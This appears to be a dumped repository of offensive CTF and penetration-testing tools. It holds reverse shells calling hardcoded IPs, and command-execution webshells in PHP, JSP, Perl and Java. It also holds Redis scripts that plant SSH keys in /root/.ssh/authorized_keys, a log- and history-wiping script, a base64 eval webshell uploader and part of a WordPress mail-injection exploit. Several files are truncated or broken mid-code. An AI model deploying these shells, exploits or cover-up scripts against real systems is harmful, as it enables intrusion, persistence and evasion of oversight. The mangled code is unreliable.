├── scripts ├── python_tty.sh ├── killphp.sh ├── include_waf.sh ├── aes_decrypt.py ├── iconv_gbk_to_utf8.sh ├── shell_53_udp.py ├── htpasswd.sh ├── xssget.php ├── scanwebshell.py ├── socks5.py ├── reset_mysql_root_password.sh ├── xxtea_decrypt.c └── rtcp.py ├── flowscript ├── index.php ├── phpwaf.php ├── flow.php └── waf.php ├── tools ├── ftp.py ├── elasticsearch.py ├── drcom │ ├── Decipher.class │ ├── Decipher.py │ └── Decipher.java ├── php_mt_seed-3.2.tar.gz ├── md5_collision_bin │ ├── message1.bin │ ├── message2.bin │ └── exp.py ├── redis_ssh.sh ├── socket_shell_bash_py.sh ├── png_create.php ├── reverse-shell.pl ├── socket_shell.py ├── mongdb.py ├── random_string.py ├── redis.py ├── runmd5.py ├── post_upload.py ├── urllibreq.py ├── bash.py ├── php.py ├── rexp.py ├── ip.py ├── google.py ├── shell_53_udp.py ├── jinzhi.py ├── sqlin.py ├── portscan.py ├── portscan4.py ├── portscan2.py ├── Rescan.py ├── tarfile.py ├── socks5.py ├── ssrf.py ├── portscan3.py ├── vi_vim_scan_and_download.py ├── rtcp.py ├── ssltest.py └── iis_shortname_Scan.py ├── dict ├── web │ ├── ASP.txt │ ├── DIR.txt │ ├── JSP.txt │ ├── MDB.txt │ ├── PHP.txt │ └── ASPX.txt ├── dir │ ├── 5.php.txt │ └── raft-large-files.txt ├── password │ ├── 字典.txt │ ├── phpbb.txt │ ├── 渗透字典.txt │ ├── 自己收集的密码.txt │ ├── passwords.txt │ ├── Defaultpass.txt │ ├── tianya-top-1w.txt │ ├── simple-pass.txt │ ├── adobe100.txt │ ├── 12306-14W-top100.txt │ ├── top100password.txt │ ├── 3389爆破字典.txt │ └── twitter.txt ├── webshell │ ├── 收藏的后门密码.txt │ ├── shellpassword.txt │ ├── webshll木马常用密码.txt │ ├── webshll木马常用密码1.txt │ ├── webshellPassword.txt │ └── webshell_password_no_name.txt ├── dicts.py ├── ssrf │ ├── deal_log.py │ ├── proc.dic │ ├── log.dic │ └── config.dic └── wifipass │ └── wifi_password_top_100.txt ├── exp └── win │ ├── pr.exe │ ├── GetPass.zip │ ├── ms16-032.exe │ ├── pr_3389.exe │ ├── ms16-032_x64.exe │ └── GetPassword_x64.zip ├── sh ├── echo.sh ├── ftpd.sh ├── clear_log.sh └── install_waf.sh ├── misc ├── 
Stegsolve.jar └── ZipCenOp.jar ├── webshell ├── sh │ ├── cmd.sh │ ├── up.sh │ └── list.sh ├── asp │ ├── ice.asp │ └── wumi.asp ├── jsp │ ├── UpServlet.class │ ├── CmdServlet.class │ ├── ListServlet.class │ ├── cmd.jsp │ ├── CmdServlet.java │ ├── UpServlet.java │ ├── ListServlet.java │ └── up.jsp ├── php │ ├── supershell.php │ ├── cmd.php │ ├── list.php │ └── up.php ├── pl-cgi │ ├── cmd.pl │ └── list.pl ├── servlet │ ├── CmdServlet.java │ ├── UpServlet.java │ └── ListServlet.java └── c │ └── cmd.c ├── other ├── py-server-cmd.txt └── test.py ├── proxy ├── Earthworm │ ├── ew_mipsel │ ├── ew_for_Arm32 │ ├── ew_for_Linux32 │ ├── ew_for_MacOSX64 │ ├── ew_for_Win.exe │ ├── ew_for_linux64 │ └── Readme.txt └── Termite │ ├── admin_MacOS_x64 │ ├── admin_linux_i586 │ ├── admin_linux_i686 │ ├── admin_win32.exe │ ├── agent_MacOS_x64 │ ├── agent_linux_i586 │ ├── agent_linux_i686 │ ├── agent_linux_m68k │ ├── agent_linux_mips │ ├── agent_linux_sh4 │ ├── agent_linux_sparc │ ├── agent_win32.exe │ ├── admin_linux_x86_64 │ ├── agent_linux_armv4l │ ├── agent_linux_armv5l │ ├── agent_linux_mipsel │ ├── agent_linux_powerpc │ ├── agent_linux_x86_64 │ ├── agent_linux_powerpc-440fp │ └── README.md ├── awd ├── s1.sh ├── kill_php_fpm.sh ├── include.sh ├── nodieshell.php ├── bak.sh ├── grep_audit.md ├── echo_shell_base64_code.php ├── showflageveryphp.php ├── s1.php ├── s4.php ├── s3.php ├── s2.php ├── submitFlag.py ├── wordpress_exp.py ├── shell.py ├── wordpress_phpmailer_exploit.sh ├── flask_submit_flask.py ├── shell_manager.py ├── fuck_pc.py ├── shellmanager.py ├── fuck_wp_1.py └── fuck.py ├── README.md ├── wrapper ├── Makefile ├── hook.c ├── wrapper_pipe.c └── wrapper_socket.c ├── crypto └── base64_encode_custom_table.c ├── coder └── bashfuck.py └── gen_xbin_avi.py /scripts/python_tty.sh: -------------------------------------------------------------------------------- 1 | python -c 'import pty; pty.spawn("/bin/bash")' 
-------------------------------------------------------------------------------- /flowscript/index.php: -------------------------------------------------------------------------------- 1 | " 6 | } -------------------------------------------------------------------------------- /tools/redis_ssh.sh: -------------------------------------------------------------------------------- 1 | redis-cli -h $1 flushall 2 | cat pub.txt | redis-cli -h $1 -x set 1 3 | redis-cli -h $1 config set dir /root/.ssh 4 | redis-cli -h $1 config set dbfilename authorized_keys 5 | redis-cli -h $1 save -------------------------------------------------------------------------------- /sh/clear_log.sh: -------------------------------------------------------------------------------- 1 | sed -i '/publickey/d' /var/log/secure \ 2 | && sed -i '/log/d' ~/.bash_history \ 3 | && sed -i '/history/d' ~/.bash_history \ 4 | && sed -i '/sed/d' ~/.bash_history \ 5 | && sed -i '/sh/d' ~/.bash_history -------------------------------------------------------------------------------- /awd/nodieshell.php: -------------------------------------------------------------------------------- 1 | /dev/null"); 8 | } -------------------------------------------------------------------------------- /awd/bak.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z $1 ];then 3 | echo './bak.sh webroot' 4 | else 5 | echo "WWWROOT : $1" 6 | tar -zcvf /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz $1 7 | echo "Backup : /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz" 8 | fi 9 | -------------------------------------------------------------------------------- /tools/socket_shell_bash_py.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.78.13.23",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -------------------------------------------------------------------------------- /webshell/php/supershell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /awd/grep_audit.md: -------------------------------------------------------------------------------- 1 | grep -i -r "\$_GET" /path 2 | grep -i -r "\$_GET" |grep eval 3 | grep -i -r "\$_GET" |grep assert 4 | grep -i -r "\$_GET" |grep system 5 | grep -i -r "\$_GET" |grep call_user 6 | grep -i -r "\$_GET" |grep eval_r 7 | grep -i -r "\$_GET" |grep preg_replace 8 | grep -i -r "\$_GET" |grep exec -------------------------------------------------------------------------------- /tools/png_create.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tools/reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use Socket; 4 | $i = "192.168.31.157"; 5 | $p = 7788; 6 | socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); 7 | if(connect(S,sockaddr_in($p,inet_aton($i)))){ 8 | open(STDIN,">&S"); 9 | open(STDOUT,">&S"); 10 | open(STDERR,">&S"); 11 | exec("/bin/sh -i"); 12 | }; -------------------------------------------------------------------------------- /tools/socket_shell.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | import os 4 | IP = "127.0.0.1" 5 | PORT = 9999 6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | s.connect((IP, PORT)) 8 | os.dup2(s.fileno(), 0) 9 | os.dup2(s.fileno(), 1) 10 | os.dup2(s.fileno(), 2) 11 | p = subprocess.call(["/bin/bash", "-i"]) 12 | -------------------------------------------------------------------------------- 
/awd/echo_shell_base64_code.php: -------------------------------------------------------------------------------- 1 | ' $pf #应该写waf的绝对路径 11 | done 12 | #在每一个php文件最后插马 13 | #sed -i '$ a\' xxx.php 14 | #还原waf,以其他php正确包含waf 15 | mv waf.phpbk waf.php 16 | 17 | -------------------------------------------------------------------------------- /tools/mongdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import pymongo 4 | import random 5 | 6 | fobj = open('27017.txt','r') 7 | fileHandle = open('vul.txt','a+') 8 | for target in fobj: 9 | ip_addr = target.strip() 10 | try: 11 | print target.strip() 12 | conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000) 13 | print "ok" 14 | fileHandle.write(target) 15 | except Exception, e: 16 | print "can't conn" -------------------------------------------------------------------------------- /awd/showflageveryphp.php: -------------------------------------------------------------------------------- 1 | >>".file_get_content("/pathflagpathflag")."<<<";?>',FILE_APPEND); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | ?> -------------------------------------------------------------------------------- /awd/s1.php: -------------------------------------------------------------------------------- 1 | \r\n'.file_get_contents($afile)); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | 15 | ?> -------------------------------------------------------------------------------- /webshell/php/cmd.php: -------------------------------------------------------------------------------- 1 | 2 | // 3 | // PHP_KIT 4 | // 5 | // cmd.php = Command Execution 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 |
12 | 16 |
17 |
18 | if($_GET['cmd']) {
19 | system($_GET['cmd']);
20 | }
21 | ?>
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/scripts/aes_decrypt.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf8 -*-
2 | import sys
3 | from Crypto.Cipher import AES
4 |
5 |
def decrypt_aes(key, data):
    """Decrypt *data* with AES in ECB mode and return the raw plaintext.

    Args:
        key: AES key handed straight to ``AES.new``; AES keys are 16, 24 or
            32 bytes. NOTE(review): on Python 3 ``sys.argv`` yields str, and
            the cipher expects bytes — confirm the caller encodes it.
        data: ciphertext; ECB works block by block, so the length has to be a
            whole number of 16-byte blocks or ``decrypt`` rejects it.

    Returns:
        The decrypted bytes exactly as produced by the cipher; no padding is
        stripped here.

    ECB provides no integrity/authenticity check and equal plaintext blocks
    give equal ciphertext blocks, so this is only suitable for recovering data
    that was produced by a matching ECB encryption, not as a general design.
    """
    obj = AES.new(key, AES.MODE_ECB)
    return obj.decrypt(data)
9 |
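if __name__ == '__main__':
    # CLI entry point: argv[1] is the key, argv[2] the file holding the ciphertext.
    if len(sys.argv) < 3:
        print("%s key encrypt" % sys.argv[0])
        # `return` is not allowed at module level (SyntaxError in the original);
        # exit non-zero so a caller can tell the usage error from a bad decrypt.
        sys.exit(1)
    key = sys.argv[1]
    # `with` closes the handle even if read() fails; the original leaked it.
    with open(sys.argv[2], 'rb') as fh:
        data = fh.read()
    print(decrypt_aes(key, data))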
17 |
--------------------------------------------------------------------------------
/tools/random_string.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import string
5 | import random
6 | import sys
7 |
8 | reload(sys)
9 | sys.setdefaultencoding("utf-8")
10 |
11 |
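def randstr(num=10):
    """Return *num* distinct lowercase ASCII letters in a random order.

    Args:
        num: number of characters to draw. Letters are drawn without
            replacement, so ``num`` must be 0..26; ``random.sample`` raises
            ValueError above that.

    Returns:
        A str of length *num*.

    ``string.join`` was removed in Python 3; ``str.join`` is the portable form.
    ``random`` is not a cryptographic generator — for tokens, passwords or
    anything security-sensitive use ``secrets`` (e.g. ``secrets.choice``).
    """
    # The reversed alphabet is the same population, in the same order, as the
    # original 'z'..'a' list literal, so seeded draws stay identical.
    return ''.join(random.sample(string.ascii_lowercase[::-1], num))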
14 |
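if __name__ == '__main__':
    # print() with one argument works on both Python 2 and 3; the bare
    # `print randstr()` statement is a SyntaxError on Python 3.
    print(randstr())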
17 |
--------------------------------------------------------------------------------
/awd/s4.php:
--------------------------------------------------------------------------------
1 | ');
6 | $bash =<<" 16 | cat /tmp/upload 17 | echo "" 18 | 19 | -------------------------------------------------------------------------------- /tools/redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys,httplib 5 | import socket,sys 6 | fobj = open('redis.txt','r') 7 | fileHandle = open('vul.txt','a+') 8 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' 9 | s = socket.socket() 10 | socket.setdefaulttimeout(10) 11 | for target in fobj: 12 | ip = target.strip() 13 | try: 14 | port = 6379 15 | s.connect((ip, port)) 16 | s.send(payload) 17 | recvdata = s.recv(1024) 18 | if recvdata and 'redis_version' in recvdata: 19 | fileHandle.write(target) 20 | print 'server is vulerable' 21 | except: 22 | pass 23 | -------------------------------------------------------------------------------- /tools/runmd5.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import md5 5 | 6 | def md5x(str): 7 | m1 = md5.new() 8 | m1.update(str) 9 | return m1.hexdigest() 10 | 11 | 12 | def run(arg): 13 | code = arg[0] 14 | start = 10000000 15 | end = 100000000 16 | if len(arg) > 2: 17 | start = arg[1] 18 | if len(arg) > 3: 19 | start = arg[2] 20 | if not code: 21 | return False 22 | print 'Runing...' 
23 | while start <= end: 24 | res = md5x(str(start))[:len(code)] 25 | if res == code: 26 | print start 27 | return start 28 | start += 1 29 | 30 | if __name__ == '__main__': 31 | run(['1ceac']) -------------------------------------------------------------------------------- /webshell/php/list.php: -------------------------------------------------------------------------------- 1 | 2 | // 3 | // PHP_KIT 4 | // 5 | // list.php = Directory & File Listing 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | 13 | 14 | if($_GET['file']) { 15 | $fichero=$_GET['file']; 16 | } else { 17 | $fichero="/"; 18 | } 19 | 20 | if($handle = @opendir($fichero)) { 21 | while($filename = readdir($handle)) { 22 | echo "( ) " . $filename . "
";
27 | $fp = fopen($fichero, "r");
28 | $buffer = fread($fp, filesize($fichero));
29 | echo $buffer;
30 | fclose($fp);
31 | }
32 |
33 | ?>
--------------------------------------------------------------------------------
/scripts/iconv_gbk_to_utf8.sh:
--------------------------------------------------------------------------------
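#!/bin/bash
# Convert every *.$SUBFIX file below a directory from GB2312 to UTF-8, in place,
# keeping a "<file>_bak" copy of each converted original.
# Usage: iconv_gbk_to_utf8.sh [directory]   (default: current directory)
# bash is required: the original already used [[ ]], and read -d '' is used below.
SUBFIX="php" # extensions of the files to convert (space separated)

if [ -z "$1" ]; then
    cd "$PWD" || exit 1
else
    if [ -d "$1" ]; then
        cd "$1" || exit 1
    else
        echo " $1 is not exist;"
        exit 1
    fi
fi

for i in $SUBFIX; do
    # NUL-delimited find/read keeps names containing spaces or newlines intact;
    # the original word-split the output of `find`.
    find . -name "*.$i" -print0 | while IFS= read -r -d '' f; do
        # Files that `file` already reports as UTF-8 need no conversion. The
        # original test was inverted: it converted exactly the UTF-8 files
        # (corrupting them) and left the GB2312 ones alone.
        if file "$f" | grep -q "UTF-8"; then
            continue
        fi
        echo "converting $f"
        # "$f_bak" in the original expanded the (empty) variable f_bak,
        # not "$f" followed by "_bak".
        cp "$f" "${f}_bak" || continue
        # iconv writes to stdout, so convert into a temp file and only swap
        # it in when the whole file converted cleanly.
        if iconv -f GB2312 -t UTF-8 "$f" > "$f.tmp"; then
            mv "$f.tmp" "$f"
        else
            rm -f "$f.tmp"
            echo "conversion failed: $f" >&2
        fi
    done
done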
--------------------------------------------------------------------------------
/tools/post_upload.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests
5 | import re
6 | import string
7 | import random
8 | import sys
9 |
10 | reload(sys)
11 | sys.setdefaultencoding("utf-8")
12 |
13 | req = requests.session()
14 | url = ''
15 |
16 |
def upload(file_name, file_data):
    """POST *file_data* as a multipart form field named ``file`` to the module-level ``url``.

    The request goes through the shared ``req`` session, so cookies from
    earlier calls on that session are sent along.

    Args:
        file_name: file name placed in the multipart part's Content-Disposition.
        file_data: the file body, passed through to ``requests`` as-is.

    Returns:
        The raw response body when the server answers 200, otherwise False.
        Non-200 responses are not reported in any way (no status, no body).
    """
    files = {
        # Content type is fixed to octet-stream regardless of file_name.
        "file": (file_name, file_data, 'application/octet-stream'),
    }
    # NOTE(review): `url` is '' at module level in this file — the target has
    # to be set before calling; the __main__ block also passes only one argument.
    res = req.post(url=url, files=files)
    if res.status_code == 200:
        return res.content
    else:
        return False
26 |
27 |
28 | if __name__ == '__main__':
29 | shell1 = 'paaaPD9waHAgZXZhbCgkX1BPU1RbOTk5XSk7Pz5w'
30 | res = upload(shell1)
31 | if res:
32 | print res
33 |
--------------------------------------------------------------------------------
/webshell/php/up.php:
--------------------------------------------------------------------------------
1 |
2 | //
3 | // PHP_KIT
4 | //
5 | // up.php = File Upload
6 | //
7 | // by: The Dark Raver
8 | // modified: 21/01/2004
9 | //
10 | ?>
11 |
12 |
13 |
14 |
18 | <%
19 | if (request.getParameter("cmd") != null) {
20 | out.println("Command: " + request.getParameter("cmd") + "
");
21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
22 | OutputStream os = p.getOutputStream();
23 | InputStream in = p.getInputStream();
24 | DataInputStream dis = new DataInputStream(in);
25 | String disr = dis.readLine();
26 | while ( disr != null ) {
27 | out.println(disr);
28 | disr = dis.readLine();
29 | }
30 | }
31 | %>
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/tools/php.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,httplib
5 | from optparse import OptionParser
6 | usageString = "Usage: %prog [options] hostname"
7 | parser = OptionParser(usage=usageString)
8 | (opts,args) = parser.parse_args()
9 | if len(args) < 1:
10 | parser.error("Hostname is required")
11 | print __doc__
12 | file = sys.argv[1]
13 | fobj = open(redis.txt,'r')
14 | fileHandle = open('php.txt','a+')
15 | for target in fobj:
16 | website = target.strip()
17 | #login path
18 | dirs = ["phpinfo.php","php.php","test.php","1.php"]
19 | for line in dirs:
20 | conn = httplib.HTTPConnection(website)
21 | conn.request('GET','/'+line)
22 | r1 = conn.getresponse()
23 | if r1.status == 200 or r1.status == 301 or r1.status == 403:
24 | print website+'/'+line,r1.status,r1.reason
25 | if not s.is_vul():
26 | print 'NO vulerable'
27 | #sys.exit(0)
28 | else:
29 | fileHandle.write(target)
30 | print 'server is vulerable'
31 |
--------------------------------------------------------------------------------
/tools/rexp.py:
--------------------------------------------------------------------------------
1 | import socket
2 | from os import system
3 | from sys import argv
4 | def send(conn,cmd):
5 | try:
6 | conn.send(cmd+"\n")
7 | recv=conn.recv(5)
8 | #conn.close()
9 | recv=recv.replace("\n",''),
10 | return recv
11 | except:
12 | return False
13 |
14 | def conn_redis(args):
15 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 | args=args.split(":")
17 | host=args[0]
18 | port=int(args[1])
19 | try:
20 | client.connect((host, port))
21 | return client
22 | except:
23 | return False
24 |
25 | if len(argv)!=2:
26 | print "Usage: python rexp.py 127.0.0.1:6379"
27 | exit()
28 | host=argv[1]
29 | host.split(":")
30 | port=6379
31 | if len(host)==2:
32 | port=int(host[1])
33 | conn=conn_redis("%s:%d"%(host,port))
34 | send(conn,"flushall")
35 | system("cat foo.txt| redis-cli -h %s -p %d -x set pwn"%(host,port))
36 | cmd='''CONFIG set dir /root/.ssh/
37 | config set dbfilename authorized_keys
38 | save
39 | exit'''
40 | cmd=cmd.split("\n")
41 | for c in cmd:
42 | send(conn,c)
43 |
--------------------------------------------------------------------------------
/webshell/sh/list.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #
3 | # SH_KIT
4 | #
5 | # list.sh = Directory & File Listing
6 | #
7 | # by: The Dark Raver
8 | # modified: 16/12/2005
9 | #
10 |
11 | echo Content-Type: text/html
12 | echo
13 |
14 | if [ "$QUERY_STRING" != "" ]
15 | then
16 | echo PATH: $QUERY_STRING "" 31 | cat $QUERY_STRING 32 | else 33 | if [ "$root" != "1" ] 34 | then 35 | echo "( ) ".."30 |
" 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) "$i"
" 42 | else 43 | echo "( ) "$i"
" 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /dict/ssrf/proc.dic: -------------------------------------------------------------------------------- 1 | /proc/cmdline 2 | /proc/mounts 3 | /proc/net/arp 4 | /proc/net/fib_trie 5 | /proc/net/route 6 | /proc/net/tcp 7 | /proc/net/udp 8 | /proc/sched_debug 9 | /proc/self/fd/26 10 | /proc/self/cmdline 11 | /proc/self/cwd 12 | /proc/self/environ 13 | /proc/self/fd/0 14 | /proc/self/fd/1 15 | /proc/self/fd/10 16 | /proc/self/fd/11 17 | /proc/self/fd/12 18 | /proc/self/fd/13 19 | /proc/self/fd/14 20 | /proc/self/fd/15 21 | /proc/self/fd/16 22 | /proc/self/fd/17 23 | /proc/self/fd/18 24 | /proc/self/fd/19 25 | /proc/self/fd/2 26 | /proc/self/fd/20 27 | /proc/self/fd/21 28 | /proc/self/fd/22 29 | /proc/self/fd/23 30 | /proc/self/fd/24 31 | /proc/self/fd/25 32 | /proc/self/fd/27 33 | /proc/self/fd/28 34 | /proc/self/fd/29 35 | /proc/self/fd/3 36 | /proc/self/fd/30 37 | /proc/self/fd/31 38 | /proc/self/fd/32 39 | /proc/self/fd/33 40 | /proc/self/fd/34 41 | /proc/self/fd/35 42 | /proc/self/fd/4 43 | /proc/self/fd/5 44 | /proc/self/fd/6 45 | /proc/self/fd/7 46 | /proc/self/fd/8 47 | /proc/self/fd/9 48 | /proc/self/stat 49 | /proc/self/status 50 | /proc/verison 51 | -------------------------------------------------------------------------------- /tools/drcom/Decipher.py: -------------------------------------------------------------------------------- 1 | def Decipher(s): 2 | p = '' 3 | key = 30137 4 | for i in xrange(len(s) - 1): 5 | ch = ord(s[i]) 6 | if ch >= 32 and ch <= 126: 7 | ch -= 32 8 | offset = int(96.0 * (key * (i + 1) % 100537 / 100537.0)) 9 | ch = (ch - offset) % 95 10 | if ch < 0: 11 | ch += 95 12 | ch += 32 13 | p += chr(ch) 14 | return p 15 | 16 | 17 | def save(fff, txt): 18 | f = open(fff, 'a') 19 | for i in txt: 20 | f.write(i) 21 | f.close() 22 | 23 | 24 | def fuck(): 25 | ll = [] 26 | f = open('x.txt') 27 | x = 1 28 | try: 29 | c = f.readlines() 
30 | for i in c: 31 | i = i[1:-2].replace("\",\"", "####") 32 | t = i.split("####") 33 | ll.append(t[0] + "," + Decipher(t[1]) + "," + t[2] + ",\n") 34 | except: 35 | pass 36 | finally: 37 | save(ll) 38 | f.close() 39 | 40 | if __name__ == '__main__': 41 | # fuck('pwd.txt') 42 | print Decipher('''Sr'J`%a''') 43 | -------------------------------------------------------------------------------- /tools/ip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding=utf-8 3 | 4 | import optparse,re,sys,os 5 | 6 | def getip(_txt): 7 | result = [] 8 | f = open(_txt,"r") 9 | line = f.read() 10 | result = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) 11 | result = {}.fromkeys(result).keys() 12 | return result 13 | 14 | def ping(hosts): 15 | ipss = [] 16 | for i in hosts: 17 | ret = os.system("ping -c 1 -t 1 %s > nop" % i) 18 | #ret = os.system("ping -n 1 -w 1 %s > nop" % i) 19 | if not ret: 20 | ipss.append(i) 21 | return ipss 22 | 23 | 24 | if __name__ == '__main__': 25 | txt = [] 26 | parser = optparse.OptionParser('usage: %prog [options] target') 27 | parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. default = 20') 28 | parser.add_option('-f', '--file', dest='names_file',default='false', type='string',help='files default = false') 29 | (options, args) = parser.parse_args() 30 | 31 | if str(options.names_file) == "false": 32 | if len(args) < 1 : 33 | parser.print_help() 34 | sys.exit(0) 35 | txt = ping(getip(str(options.names_file))) 36 | print txt 37 | -------------------------------------------------------------------------------- /tools/google.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | __author__ = 'DM_' 3 | import simplejson,random 4 | import requests as req 5 | 6 | page = 1 7 | status = 200 8 | dock = str(raw_input('请输入google关键字:')) #这里是google关键词. 
9 | while status == 200: 10 | headers = { 11 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 12 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 13 | 'Accept-Encoding': 'gzip,deflate,sdch', 14 | 'Accept-Language': 'en-US,en;q=0.8', 15 | 'Connection': 'keep-alive', 16 | 'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', 17 | 'Referer': 'http://www.baidu.com/' 18 | } 19 | 20 | url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s"%(dock,page) 21 | try: 22 | HtmlContent = req.get(url, timeout=30, headers=headers).text 23 | result = simplejson.loads(HtmlContent) 24 | status = result['responseStatus'] 25 | 26 | print "第%d页的数据:" % page 27 | try: 28 | Urls = result['responseData']['results'] 29 | for url in Urls: 30 | print url['url'] 31 | except: 32 | print '当前页面获取失败.' 33 | print result['responseDetails'] 34 | page += 1 35 | except: 36 | print "Time Out or site is not open." 37 | print "一共有%d页的数据" % (page-2) 38 | -------------------------------------------------------------------------------- /webshell/pl-cgi/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
';
31 |
32 | if(defined $FORM{'cmd'}) {
33 | print "Results of '$cmd' execution:\n\n";
34 | print "-"x80;
35 | print "\n";
36 |
37 | open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 |
39 | while() {
40 | print;
41 | }
42 |
43 | close(CMD);
44 | print "-"x80;
45 | print "\n";
46 | }
47 |
48 | print " ";
49 |
50 | sub parse_parameters ($) {
51 | my %ret;
52 |
53 | my $input = shift;
54 |
55 | foreach my $pair (split('&', $input)) {
56 | my ($var, $value) = split('=', $pair, 2);
57 |
58 | if($var) {
59 | $value =~ s/\+/ /g ;
60 | $value =~ s/%(..)/pack('c',hex($1))/eg;
61 |
62 | $ret{$var} = $value;
63 | }
64 | }
65 |
66 | return %ret;
67 | }
68 |
--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * CmdServlet.java 20/01/2004
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class CmdServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 |
18 | PrintWriter out = res.getWriter();
19 | out.print("");
20 | out.print("Command: " + req.getParameter("cmd") + "\n
\n");
27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | int c='\0';
30 | while ((c=procIn.read()) != -1) {
31 | out.print((char)c);
32 | }
33 | }
34 |
35 | out.print("\n
");
36 | out.print("");
37 | }
38 |
39 | public String getServletInfo() {
40 | return "CmdServlet 0.1";
41 | }
42 |
43 | }
44 |
--------------------------------------------------------------------------------
/webshell/servlet/CmdServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * CmdServlet.java 20/01/2004
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class CmdServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 |
18 | PrintWriter out = res.getWriter();
19 | out.print("");
20 | out.print("Command: " + req.getParameter("cmd") + "\n
\n");
27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | int c='\0';
30 | while ((c=procIn.read()) != -1) {
31 | out.print((char)c);
32 | }
33 | }
34 |
35 | out.print("\n
");
36 | out.print("");
37 | }
38 |
39 | public String getServletInfo() {
40 | return "CmdServlet 0.1";
41 | }
42 |
43 | }
44 |
--------------------------------------------------------------------------------
/awd/wordpress_exp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests
3 | import sys
4 |
5 | # wordpress's url
6 | target = 'http://127.0.0.1' if not sys.argv[1] else sys.argv[1]
7 | # Put your command in a website, and use the website's url
8 | # don't contains "http://", must be all lowercase
9 | shell_url = 'example.com/1.txt' if not sys.argv[2] else sys.argv[2]
10 | # an exists user
11 | user = 'admin'
12 |
13 | def generate_command(command):
14 | command = '${run{%s}}' % command
15 | command = command.replace('/', '${substr{0}{1}{$spool_directory}}')
16 | command = command.replace(' ', '${substr{10}{1}{$tod_log}}')
17 | return 'target(any -froot@localhost -be %s null)' % command
18 |
19 |
20 | data = {
21 | 'user_login': user,
22 | 'redirect_to': '',
